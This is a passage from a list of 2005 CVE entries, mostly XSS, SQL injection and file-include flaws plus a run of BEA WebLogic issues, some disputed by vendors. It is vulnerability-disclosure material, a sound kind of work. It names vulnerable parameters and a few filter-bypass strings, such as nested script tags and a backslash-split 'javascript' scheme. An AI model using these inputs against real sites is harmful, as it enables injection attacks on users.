admin/adminindex.php, which executes the PHP phpinfo function. NOTE: The vendor has disputed this issue, saying that "Having this in the code makes it easier for us to troubleshoot when issues arise on individual carts. For someone to have a script to do this type of search would require that they know where your shop is actually located. I dont think it really can be construde [sic] as a security issue." [CVE-2005-4785] Cross-site scripting (XSS) vulnerability in QuickBlogger 1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) author ("your name") and (2) "comment" section. [CVE-2005-4780] DISPUTED Cross-site scripting (XSS) vulnerability in Fidra Lighthouse CMS 1.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter in a query_string to the home page. NOTE: The vendor disputes this issue, saying "Lighthouse does not in any way make use of the PHP technology. [It] is an application server ... A technology like this cannot be susceptible to client-side cross-site-scripting-attacks on its own, but only applications created based on such a technology. This does not only apply to Lighthouse, but also to Perl, PHP or web applications based on Java Servlet technology." Since the original researcher is known to test demo pages and is sometimes inaccurate, it is likely that this issue will be REJECTED. [CVE-2005-4774] Cross-site scripting (XSS) vulnerability in Xerver 4.17 allows remote attackers to inject arbitrary web script or HTML after a /%00/ sequence at the end of the URI. [CVE-2005-4767] BEA WebLogic Server and WebLogic Express 8.1 SP5 and earlier, and 7.0 SP6 and earlier, when using username/password authentication, does not lock out a username after the maximum number of invalid login attempts, which makes it easier for remote attackers to guess the password. [CVE-2005-4766] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP5 and earlier, do not encrypt multicast traffic, which might allow remote attackers to read sensitive cluster synchronization messages by sniffing the multicast traffic. [CVE-2005-4765] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier and 7.0 SP6 and earlier, when using the weblogic.Deployer command with the t3 protocol, does not use the secure t3s protocol even when an Administration port is enabled on the Administration server, which might allow remote attackers to sniff the connection. [CVE-2005-4764] BEA WebLogic Server and WebLogic Express 9.0, 8.1, and 7.0 lock out the admin user account after multiple incorrect password guesses, which allows remote attackers who know or guess the admin account name to cause a denial of service (blocked admin logins). [CVE-2005-4763] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier, when Internet Inter-ORB Protocol (IIOP) is used, sometimes include a password in an exception message that is sent to a client or stored in a log file, which might allow remote attackers to perform unauthorized actions. [CVE-2005-4762] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier sometimes stores the boot password in the registry in cleartext, which might allow local users to gain administrative privileges. [CVE-2005-4761] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP5 and earlier, and 6.1 SP7 and earlier log the Java command line at server startup, which might include sensitive information (passwords or keyphrases) in the server log file when the -D option is used. [CVE-2005-4760] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier, and 7.0 SP5 and earlier, when fullyDelegatedAuthorization is enabled for a servlet, does not cause servlet deployment to fail when failures occur in authorization or role providers, which might prevent the servlet from being "fully protected." [CVE-2005-4759] BEA WebLogic Server and WebLogic Express 8.1 and 7.0, during a migration across operating system platforms, do not warn the administrative user about platform differences in URLResource case sensitivity, which might cause local users to inadvertently lose protection of Web Application pages. [CVE-2005-4758] Unspecified vulnerability in the Administration server in BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier allows remote authenticated Admin users to read arbitrary files via unknown attack vectors related to an "internal servlet" accessed through HTTP. [CVE-2005-4757] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier, and 7.0 SP5 and earlier, do not properly "constrain" a "/" (slash) servlet root URL pattern, which might allow remote attackers to bypass intended servlet protections. [CVE-2005-4756] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP5 and earlier, do not properly validate derived Principals with multiple PrincipalValidators, which might allow attackers to gain privileges. [CVE-2005-4755] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier (1) stores the private key passphrase (CustomTrustKeyStorePassPhrase) in cleartext in nodemanager.config [CVE-2005-4754] BEA WebLogic Server and WebLogic Express 8.1 SP3 and earlier allow remote attackers to obtain sensitive information (intranet IP addresses) via unknown attack vectors involving "network address translation." [CVE-2005-4753] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP6 and earlier, in certain "heavy usage" scenarios, report incorrect severity levels for an audit event, which might allow attackers to perform unauthorized actions and avoid detection. [CVE-2005-4752] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, and 7.0 SP6 and earlier, might allow local users to gain privileges by using the run-as deployment descriptor element to change the privileges of a web application or EJB from the Deployer security role to the Admin security role. [CVE-2005-4751] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and WebLogic Express 9.0, 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier allow remote attackers to inject arbitrary web script or HTML and gain administrative privileges via unknown attack vectors. [CVE-2005-4750] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP5 and earlier, and 6.1 SP7 and earlier allow remote attackers to cause a denial of service (server thread hang) via unknown attack vectors. [CVE-2005-4749] HTTP request smuggling vulnerability in BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and 6.1 SP7 and earlier allows remote attackers to inject arbitrary HTTP headers via unspecified attack vectors. [CVE-2005-4747] Cross-site scripting (XSS) vulnerability in WebHost Automation Ltd Helm before 3.2.6 allows remote attackers to inject arbitrary web script or HTML via unknown vectors involving the default page. [CVE-2005-4734] Stack-based buffer overflow in IISWebAgentIF.dll in RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 for IIS allows remote attackers to execute arbitrary code via a long url parameter in the Redirect method. [CVE-2005-4732] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Tux Racer TuxBank 0.7x and 0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) description parameters. [CVE-2005-4727] Cross-site scripting (XSS) vulnerability in gbook.cgi in gBook before 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header field. [CVE-2005-4721] Cross-site scripting (XSS) vulnerability in search.cfm in tmsPUBLISHER 3.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-4707] Multiple cross-site scripting (XSS) vulnerabilities in PHP GEN before 1.3 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2005-4705] BEA WebLogic Server and WebLogic Express 8.1 through SP4, 7.0 through SP6, and 6.1 through SP7, when a Java client application creates an SSL connection to the server after it has already created an insecure connection, will use the insecure connection, which allows remote attackers to sniff the connection. [CVE-2005-4704] Unspecified vulnerability in BEA WebLogic Server and WebLogic Express 8.1 through SP3, 7.0 through SP6, and 6.1 through SP7, when SSL is intended to be used, causes an unencrypted protocol to be used in certain unspecified circumstances, which causes user credentials to be sent across the network in cleartext and allows remote attackers to gain privileges. [CVE-2005-4698] Cross-site scripting (XSS) vulnerability in TellMe 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the 91) q_IP (IP) or (2) q_Host (HOST) parameters. [CVE-2005-4697] The Microsoft Wireless Zero Configuration system (WZCS) allows local users to access WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key via certain calls to the WZCQueryInterface API function in wzcsapi.dll. [CVE-2005-4694] Unspecified vulnerability in the www_add method in Asset.pm in Plain Black WebGUI 6.3.0 and other versions before 6.7.6 allows attackers to execute arbitrary code via unknown attack vectors. [CVE-2005-4685] Firefox and Mozilla can associate a cookie with multiple domains when the DNS resolver has a non-root domain in its search list, which allows remote attackers to trick a user into accepting a cookie for a hostname formed via search-list expansion of the hostname entered by the user, or steal a cookie for an expanded hostname, as demonstrated by an attacker who operates an ap1.com Internet web site to steal cookies associated with an ap1.com.example.com intranet web site. [CVE-2005-4684] Konqueror can associate a cookie with multiple domains when the DNS resolver has a non-root domain in its search list, which allows remote attackers to trick a user into accepting a cookie for a hostname formed via search-list expansion of the hostname entered by the user, or steal a cookie for an expanded hostname, as demonstrated by an attacker who operates an ap1.com Internet web site to steal cookies associated with an ap1.com.example.com intranet web site. [CVE-2005-4682] Cross-site scripting (XSS) vulnerability in error.asp in AudienceView allows remote attackers to inject arbitrary web script or HTML via the TSerrorMessage parameter. NOTE: the provenance of this information is unknown [CVE-2005-4675] Cross-site scripting (XSS) vulnerability in list.php in Complete PHP Counter allows remote attackers to inject arbitrary web script or HTML via the c parameter. [CVE-2005-4672] Cross-site scripting (XSS) vulnerability in image-editor-52/index.php in CityPost Simple Image-Editor 0.52 allows remote attackers to inject arbitrary web script or HTML via the (1) m1, (2) m2, (3) m3, (4) imgsrc, and (5) m4 parameter. [CVE-2005-4671] Cross-site scripting (XSS) vulnerability in simple-upload-53.php in CityPost Simple PHP Upload 5.3 allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2005-4670] Cross-site scripting (XSS) vulnerability in message.php in CityPost Automated Link Exchange (LNKX) allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2005-4669] SQL injection vulnerability in RT Internet Solutions (RTIS) WebAdmin allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password fields. [CVE-2005-4665] Cross-site scripting (XSS) vulnerability in PunBB 1.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via Javascript contained in nested, malformed BBcode url tags. [CVE-2005-4663] Cross-site scripting (XSS) vulnerability in OcoMon 1.20, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2005-4655] Cross-site scripting (XSS) vulnerability in submit.php in PHP-Fusion 6.0.204 allows remote attackers to inject arbitrary web script or HTML via nested tags in the news_body parameter, as demonstrated by elements such as "<me<meta>ta" and "<sc<script>ript>". [CVE-2005-4649] Multiple cross-site scripting (XSS) vulnerabilities in Advanced Guestbook 2.2 and 2.3.1 allow remote attackers to inject arbitrary web script or HTML via (1) the entry parameter in index.php and (2) the gb_id parameter in comment.php. NOTE: The index.php/entry vector might be resultant from CVE-2005-1548. [CVE-2005-4644] Cross-site scripting (XSS) vulnerability in the HTML WikiProcessor in Edgewall Trac 0.9.2 allows remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag. [CVE-2005-4642] Multiple cross-site scripting (XSS) vulnerabilities in HydroBB 1.0.0 Beta 2 allow remote attackers to inject arbitrary web script or HTML via the s parameter to (1) search.php, (2) members.php, (3) stats.php, (4) viewforum.php, (5) register.php, (6) usercp.php, (7) groups.php, (8) pms.php, and (9) calendar.php. [CVE-2005-4637] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kayako SupportSuite 3.00.26 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) nav parameter in the downloads module, (2) Full Name and (3) Email fields in the core module, (4) Full Name, (5) Email, and (6) Subject fields in the tickets module, or (7) Registered Email field in the lostpassword feature in the core module. [CVE-2005-4627] Cross-site scripting (XSS) vulnerability in index.php in (1) GmailSite 1.0 through 1.0.4 and (2) GFHost 0.1.1 through 0.4.2 allows remote attackers to inject arbitrary web script or HTML via the lng parameter. [CVE-2005-4626] The default configuration of Recruitment Software installs admin/site.xml under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information (MySQL database credentials) via a direct request. [CVE-2005-4621] Cross-site scripting (XSS) vulnerability in the editavatar page in vBulletin 3.5.1 allows remote attackers to inject arbitrary web script or HTML via a URL in the remote avatar url field, in which the URL generates a parsing error, and possibly requiring a trailing extension such as .jpg. [CVE-2005-4613] Cross-site scripting (XSS) vulnerability in VUBB alpha rc1 allows remote attackers to inject arbitrary web script or HTML via unspecified fields in the user edit profile. [CVE-2005-4607] Cross-site scripting (XSS) vulnerability in index.php in BugPort 1.147 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) ids[0], (2) action, (3) report_id, (4) devWherePair[1][1], and (5) binds[0] parameters. [CVE-2005-4606] SQL injection vulnerability in check_user.asp in multiple Web Wiz products including (1) Site News 3.06 and earlier, (2) Journal 1.0 and earlier, (3) Polls 3.06 and earlier, and (4) and Database Login 1.71 and earlier allows remote attackers to execute arbitrary SQL commands via the txtUserName parameter. [CVE-2005-4603] Cross-site scripting (XSS) vulnerability in printthread.php in MyBB 1.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a thread message, which is not properly sanitized in the print view of the thread. [CVE-2005-4599] Cross-site scripting (XSS) vulnerability in tiny_mce_gzip.php in TinyMCE Compressor PHP before 1.06 allows remote attackers to inject arbitrary web script or HTML via the index parameter. [CVE-2005-4598] Cross-site scripting (XSS) vulnerability in home.php in OoApp Guestbook 2.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2005-4597] Cross-site scripting (XSS) vulnerability in index.php in iPei Guestbook 1.7 allows remote attackers to inject arbitrary web script or HTML via the email parameter, as used by the email field, when signing a guestbook. [CVE-2005-4596] Cross-site scripting (XSS) vulnerability in read.php in AdesGuestbook 2.0 allows remote attackers to inject arbitrary web script or HTML via the totalRows_rsRead parameter. [CVE-2005-4588] Cross-site scripting (XSS) vulnerability in Koobi 5 allows remote attackers to inject arbitrary web script or HTML via nested, malformed url BBCode tags. NOTE: the provenance of this information is unknown [CVE-2005-4582] Electric Sheep 2.6.3 does not require authentication or integrity checks from the server to the client, which allows remote attackers to download and display arbitrary MPEG movie files via (1) DNS spoofing, (2) a URL on the command line, or (3) a URL in the configuration file. NOTE: the same attack vectors apply to common web browsers that are able to communicate with untrusted web servers, and other problems related to DNS design issues. Therefore this may not be a specific vulnerability. However, a client would reasonably expect to receive content only from the server. [CVE-2005-4580] Cross-site scripting (XSS) vulnerability in Day Communique 4 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search. [CVE-2005-4577] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in an unspecified input form. [CVE-2005-4576] Multiple cross-site scripting (XSS) vulnerabilities in the UpdateEngine program in Fatwire UpdateEngine 6.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) COUNTRYNAME, (2) EMAIL, and (3) FUELAP_TEMPLATENAME parameters. [CVE-2005-4574] Cross-site scripting (XSS) vulnerability in loader.cfm in PaperThin CommonSpot Content Server 4.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the bNewWindow parameter. [CVE-2005-4571] Cross-site scripting (XSS) vulnerability in myEZshop Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the Keyword parameter. NOTE: the provenance of this information is unknown [CVE-2005-4567] Multiple cross-site scripting (XSS) vulnerabilities in FTGate Technology (formerly known as Floosietek) FTGate 4.4 (Build 4.4.000 Oct 26 2005) allow remote attackers to inject arbitrary web script or HTML by sending (1) the href parameter to index.fts, or the param1 parameter to (2) /domains/index.fts, (3) /config/licence.fts, or (4) /config/systemacl.fts. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4559] mail/include.html in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly initialize the default_layout and layout_settings variables when an unrecognized HTTP_USER_AGENT string is provided, which allows remote attackers to access arbitrary files via a request with an unrecognized User Agent that also specifies the desired default_layout and layout_settings parameters. [CVE-2005-4558] IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html. [CVE-2005-4557] dir/include.html in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, allows remote attackers to include arbitrary local files via a null byte (%00) in the lang parameter, possibly due to a directory traversal vulnerability. [CVE-2005-4556] PHP remote file include vulnerability in IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, when register_globals is enabled, allows remote attackers to include arbitrary local and remote PHP files via a URL in the (1) lang_settings and (2) language parameters in (a) accounts/inc/include.php and (b) admin/inc/include.php. [CVE-2005-4555] Cross-site scripting (XSS) vulnerability in add.php in DEV web management system 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) ENTER_ARTICLE_TITLE, (2) SPECIFY_ZONE, (3) ENTER_ARTICLE_HEADER, and (4) ENTER_ARTICLE_BODY indices in the language array parameter. [CVE-2005-4554] Multiple SQL injection vulnerabilities in DEV web management system 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat parameter in an openforum action (openforum.php) in index.php, (2) cat parameter in getfile.php, and (3) target parameter in download_now.php. [CVE-2005-4551] Cross-site scripting (XSS) vulnerability in sign.php in codegrrl SimpBook 1.0, when html_enable is on, allows remote attackers to inject arbitrary web script or HTML via the message parameter to index.php. [CVE-2005-4549] Cross-site scripting (XSS) vulnerability in Oracle Application Server (OracleAS) Discussion Forum Portlet allows remote attackers to inject arbitrary web script or HTML via the (1) RowKeyValue parameter in the PORTAL schema [CVE-2005-4545] Cross-site scripting (XSS) vulnerability in search.asp in NetDirect ShopEngine allows remote attackers to inject arbitrary web script or HTML via the EXPS parameter. NOTE: the provenance of this information is unknown [CVE-2005-4530] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft EPay Enterprise 3.0 (formerly DoPays) allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters in (1) profile.htm, (2) card.htm, (3) bank.htm, (4) subscriptions.htm, (5) send.htm, (6) request.htm, (7) forgot.htm, (8) escrow.htm, (9) donations.htm, and (10) products.htm. [CVE-2005-4526] Clearswift MIMEsweeper For Web (a.k.a. WEBsweeper) 4.0 through 5.1 allows remote attackers to bypass filtering via a URL that does not include a .exe extension but returns an executable file. [CVE-2005-4522] Multiple cross-site scripting (XSS) vulnerabilities in the view_filters_page.php filters script in Mantis 1.0.0rc3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) view_type and (2) target_field parameters. [CVE-2005-4516] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Fusion 6.00.200 through 6.00.300 allow remote attackers to inject arbitrary web script or HTML via (1) the sortby parameter in members.php and (2) IMG tags. [CVE-2005-4515] DISPUTED SQL injection vulnerability in WebDB 1.1 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified search parameters, possibly Search0. NOTE: the vendor has disputed this issue, saying that "WebDB is a generic online database system used by many of the clients of Lois Software. The flaw that was identified was some code that was added for a client to do some testing of his system and only certain safe commands were allowed. This code has now been removed and it is not now possible to use SQL queries as part of the query string. No installation or patch is required All clients use a common code library and have their own front end and databases and connections. So as soon as a change / upgrade / enhancement is made to the code, all users of the software begin to use the latest changes immediately." Since the issue appeared in a custom web site and no action is required on the part of customers, this issue should not be included in CVE. [CVE-2005-4514] DISPUTED The encapsulation script mechanism in Webwasher CSM Appliance Suite 5.x uses case-sensitive detection of malicious tokens, which allows attackers to bypass script detection by using tokens that can be upper or lower case. NOTE: the vendor has stated that this problem could not be reproduced, and has asked the researcher for more information, without a response as of 20060103. [CVE-2005-4513] Cross-site scripting (XSS) vulnerability in WANDSOFT e-SEARCH allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the keywords parameter. [CVE-2005-4512] Cross-site scripting (XSS) vulnerability in WAXTRAPP 3.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4507] Multiple cross-site scripting (XSS) vulnerabilities in Nexus Concepts Dev Hound 2.24 and earlier allow remote attackers to inject arbitrary web script or HTML via multiple unspecified user input fields. [CVE-2005-4502] Cross-site scripting (XSS) vulnerability in httprint v202, and possibly other versions before v301, allows remote attackers to inject arbitrary web script or HTML via the Server field in an HTTP response, which is not sanitized before being displayed to the user. [CVE-2005-4498] Cross-site scripting (XSS) vulnerability in Text-e 1.6.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4497] Cross-site scripting (XSS) vulnerability in Tangora Portal CMS 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the action parameter in a search page, as demonstrated using (1) page1631.aspx and (2) page496.aspx. [CVE-2005-4496] Cross-site scripting (XSS) vulnerability in search in SyntaxCMS 1.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search_query parameter. [CVE-2005-4494] Cross-site scripting (XSS) vulnerability in SPIP 1.8.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) spip_login.php3 and (2) spip_pass.php3. [CVE-2005-4493] Cross-site scripting (XSS) vulnerability in SpearTek 6.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4492] Cross-site scripting (XSS) vulnerability in Starphire SiteSage 5.0.18 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the norelay_highlight_words parameter. [CVE-2005-4491] Multiple cross-site scripting (XSS) vulnerabilities in Sitekit CMS 6.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) query string, (2) textonly, (3) locID, and (4) lang parameters to (a) Default.aspx, and the (6) ClickFrom parameter to (b) Request-call-back.html and (c) registration-form.html. NOTE: the vendor states "This issue was resolved by a minor update to Sitekit CMS v6.6, sanitising the html code and eradicating related security issues." [CVE-2005-4490] Multiple cross-site scripting (XSS) vulnerabilities in SCOOP! 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) keyword and (2) invalid parameter to articleSearch.asp [CVE-2005-4489] Cross-site scripting (XSS) vulnerability in Scoop 1.1 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) type and (2) count parameters, and (3) the query string in a story. [CVE-2005-4488] Multiple cross-site scripting (XSS) vulnerabilities in index.tpl in Redakto WCMS 3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) iid, (2) iid2, (3) r, (4) cart, (5) str, (6) nf, and (7) a parameters. [CVE-2005-4487] Cross-site scripting (XSS) vulnerability in RAMSite R\|1 CMS 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchfield parameter. [CVE-2005-4485] Multiple cross-site scripting (XSS) vulnerabilities in ProjectApp 3.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the keywords parameter to (1) forums.asp, (2) search_employees.asp, (3) cat.asp, and (4) links.asp [CVE-2005-4484] Multiple cross-site scripting (XSS) vulnerabilities in IntranetApp 3.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ret_page parameter to login.asp or the (2) do_search and (3) search parameters to content.asp. [CVE-2005-4483] Cross-site scripting (XSS) vulnerability in login.asp in SiteEnable 3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the ret_page parameter. [CVE-2005-4482] Cross-site scripting (XSS) vulnerability in login.asp in PortalApp 3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the ret_page parameter. [CVE-2005-4481] DISPUTED Cross-site scripting (XSS) vulnerability in Polopoly 9 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. NOTE: the vendor has disputed this vulnerability, stating that the "XSS flaw was only part of the custom implementation of the [polopoly] site". As of 20061003, CVE has no further information on this issue, except that the original researcher has a history of testing live sites and assuming that discoveries indicate vulnerabilities in the associated package. [CVE-2005-4480] Cross-site scripting (XSS) vulnerability in Plexcor CMS 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4477] Cross-site scripting (XSS) vulnerability in papaya CMS 4.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the bab[searchfor] parameter. [CVE-2005-4476] Cross-site scripting (XSS) vulnerability in store/search/results.html in OpenEdit 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) oe-action and (2) page parameters. [CVE-2005-4475] Cross-site scripting (XSS) vulnerability in OpenCms 6.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4473] Unspecified vulnerability in Macromedia JRun 4 web server (JWS) allows remote attackers to view web application source code via "a malformed URL." [CVE-2005-4472] Stack-based buffer overflow in the Macromedia JRun 4 web server (JWS) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long request that is not properly handled during conversion to wide characters. [CVE-2005-4462] PHP remote file include vulnerability in usermods.php in Tolva PHP website system 0.1.0 allows remote attackers to execute arbitrary code via a URL in the ROOT parameter. [CVE-2005-4460] Cross-site scripting (XSS) vulnerability in Beehive Forum 0.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Description, and (3) Comment fields to (a) links.php and (b) links_add.php. [CVE-2005-4454] Validate-before-filter vulnerability in cleanhtml.pl 1.129 in LiveJournal CVS before Dec 7 2005, when the cleancss option is enabled, allows remote attackers to conduct cross-site scripting (XSS) attacks via a "\" (backslash) within a "javascript" scheme in a style property (such as "javas\cript"), which bypasses the "javascript" check before the "\" is stripped and then rendered in web browsers that allow scripting in style sheets. [CVE-2005-4452] Information Call Center stores the CallCenterData.mdb database under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and passwords. [CVE-2005-4446] Cross-site scripting (XSS) vulnerability in index.asp in ASPBite 8.x allows remote attackers to inject arbitrary web script or HTML via the strSearch parameter. [CVE-2005-4435] Cross-site scripting (XSS) vulnerability in index.php AbleDesign D-Man 3.x allows remote attackers to inject arbitrary web script or HTML via the title parameter. NOTE: the provenance of this information is unknown [CVE-2005-4434] Cross-site scripting (XSS) vulnerability in AbleDesign ReSearch 2.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown [CVE-2005-4433] Cross-site scripting (XSS) vulnerability in search.php in Esselbach Storyteller CMS 1.8 allows remote attackers to inject arbitrary web script or HTML via the query parameter, which is used by the Search field. [CVE-2005-4432] Cross-site scripting (XSS) vulnerability in index.php in PlaySMS 0.8 allows remote attackers to inject arbitrary web script or HTML via the err parameter. [CVE-2005-4428] Cross-site scripting (XSS) vulnerability in index.php in Cerberus Helpdesk allows remote attackers to inject arbitrary web script or HTML via the kb_ask parameter. [CVE-2005-4426] Interpretation conflict in YaBB before 2.1 allows remote authenticated users to inject arbitrary web script or HTML via HTML in a file with a GIF file extension, which causes the HTML to be executed by a victim who views the file in Internet Explorer as a result of CVE-2005-3312. NOTE: it could be argued that this vulnerability is due to a design flaw in Internet Explorer and the proper fix should be in that browser [CVE-2005-4421] Dev-Editor 3.0 allows remote attackers to access any directory outside the web root whose name is a substring of the web root directory name. [CVE-2005-4420] Cross-site scripting (XSS) vulnerability in Honeycomb Archive Enterprise 3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the keyword parameter in search.cfm. [CVE-2005-4415] Cross-site scripting (XSS) vulnerability in index.php in TML CMS 0.5 allows remote attackers to inject arbitrary web script or HTML via the form parameter. [CVE-2005-4413] Multiple cross-site scripting (XSS) vulnerabilities in sample scripts in IBM WebSphere Application Server 6 allow remote attackers to inject arbitrary web script or HTML via the (1) E-mail address field to (a) PlantsByWebSphere/login.jsp, (2) message field to (b) TechnologySample/BulletinBoard Script, (3) Email address field to (c) TechnologySamples/Subscription, and the (4) Movie Name, (5) Movie Reviewer, and (6) Movie Review fields to (d) TechnologySamples/MovieReview2_1. [CVE-2005-4410] Cross-site scripting (XSS) vulnerability in NQcontent 3 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the text parameter. [CVE-2005-4409] Cross-site scripting (XSS) vulnerability in MMBase 1.7.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. [CVE-2005-4407] Cross-site scripting (XSS) vulnerability in index.cfm in Mercury CMS 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) content and (2) criteria parameters. [CVE-2005-4401] Cross-site scripting (XSS) vulnerability in Lutece 1.2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the query parameter. [CVE-2005-4400] Cross-site scripting (XSS) vulnerability in downloads/portal_ent in Liferay Portal Enterprise 3.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) _77_struts_action, (2) p_p_mode, and (3) p_p_state parameters. [CVE-2005-4399] Cross-site scripting (XSS) vulnerability in search/index.php in Libertas Enterprise CMS 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the page_search parameter. [CVE-2005-4398] DISPUTED NOTE: the vendor has disputed this issue. Cross-site scripting (XSS) vulnerability in lemoon 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the q parameter. NOTE: the vendor has disputed this issue, saying "Sites are built on top of ASP.NET and you use lemoon core objects to easily manage and render content. The XSS vuln. you are referring to exists in one of our public sites built on lemoon i.e. a custom made site (as all sites are). The problem exists in a UserControl that handles form input and is in no way related to the lemoon core product." [CVE-2005-4396] Cross-site scripting (XSS) vulnerability in admin/Default.asp in iCMS allows remote attackers to inject arbitrary web script or HTML via the LoginMSG parameter. NOTE: the provenance of this issue is unknown [CVE-2005-4395] Cross-site scripting (XSS) vulnerability in FarCry 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the criteria parameter. [CVE-2005-4394] Cross-site scripting (XSS) vulnerability in EPiX 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search query parameters. [CVE-2005-4393] Cross-site scripting (XSS) vulnerability in show.cfm in e-publish CMS 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) obcatid and (2) comid parameters. [CVE-2005-4391] Cross-site scripting (XSS) vulnerability in damoon allows remote attackers to inject arbitrary 